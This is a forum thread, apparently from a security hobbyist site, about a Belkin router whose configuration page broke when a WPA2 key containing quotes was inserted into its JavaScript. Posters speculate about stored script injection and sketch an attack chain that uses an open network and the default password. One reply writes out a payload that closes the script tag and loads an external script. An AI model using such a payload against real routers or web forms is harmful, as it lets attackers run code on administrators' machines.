Jump to content

Belkin router JavaScript vulnarability?


Recommended Posts

Posted

ok, so this is my fun story :D

I was setting up my new wireless AP (Belkin some thing other other) and for the sake of lazyness I grabbed my WPA2 PSK from http://grc.com/passwords.htm and used the full ASCII range. Now, it worked fine I could connect to it and all that, but when I went back to security configuration page the page refused to load.

So I looked at the source code a bit, and came to the conclusion that the PSK I had used was been interpreted by the browser as part of the JavaScript of the page and was causing the page to not load.

I didn't go this far, but, because, the browser was trying to run my PSK as JavaScript, it instantly jumped in to my mind that some one could use this to put malitius code on peoples routers configuration web pages. To make it clear, I haven't figured out how my PSK broke the JavaScript.

Never the less, this made me realise that it should be easy for some one to insert a iframe on to some ones router config page (and perhaps still hve it continue to work). Even though I'm a pretty internet savy guy (as you all probably know ;)), I would always trust the scripting on my router config pages and wouldn't think twice about open the router config in IE if that was my only available option.

So, basically, what COULD happen is this:

Malitius person injects JavaScript on to router config page (by connecting on to open wifi and using default password).

Actual user realises they can't connect to there wifi because suddenly it's asking or a password.

They, probably, call more tech savy person who realises that the PSK got changed.

Tech savy person wires in to the router, visits the router config page in IE (since that's all that's likely to be available).

IE renders page with embeded iFrame and the box get OWNED! Time for a formating of the HD with ext3.

Thoughts?

Posted

Thats nothing, our internal ticketing system for call tracking will process any php/html/javascript code you paste into it...

Posted
Thats nothing, our internal ticketing system for call tracking will process any php/html/javascript code you paste into it...

ouch... please tell me that isn't remotely accessible...

Posted

do you think this is a one time fluke or that it is a problem inherent to belkin wifi products>?

And are you planning on do a proof of concept anytime soon>?

Posted
do you think this is a one time fluke or that it is a problem inherent to belkin wifi products>?

And are you planning on do a proof of concept anytime soon>?

I would say that it will be a problem with any Belkin routers that use this particular web interface.

I have the FSD7231-4, I haven't worked out which character caused the page to brake (with 255 possible characters that would be kind of difficult to do in a non-scripting way). However, in practicality, once you have escaped the text box (it might be a a couple of characters of course, not just 1), you still have (at most) 62 characters with which to place your own JavaScript. This weekend I will do some digging around in to this and see if I can't place a iFrame on my own routers config page, or at least have it display a fun popup.

Posted

Hmmm... Javascript you say?

Here's a possible scenario, your router is probably doing a some sort of server side scripting. It then generates the page which happens to contain a javascript something like:

var key = "[your key]";

the problem is that you key could contain a quote, it could be a single or double quote, as javascript uses both for strings. for instance:

var key = "my"lame"key";

now what you have to do is add a </script>after the quote, and link to an external script. so your key could be:

"&lt;/script&gt;&lt;script src="http://hak5.org/a.js"&gt;&lt;/script&gt;

But this is hypothetical, seeing I don't have the source or the key, but a quick run to grc's password page reveals that those passwords are chock full of quotes and other things that could get you in trouble. But if you care to post your key and the source of that page, I will be glad to install spyware on you computer... I mean... ummm... goodbye... :wink:

Posted

Ye lol, that's probably what's happening.

I would give you the key, but in my haste to try and get it working (as in, able to change the PSK) it completely went out of my mind to save it for further analysis.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...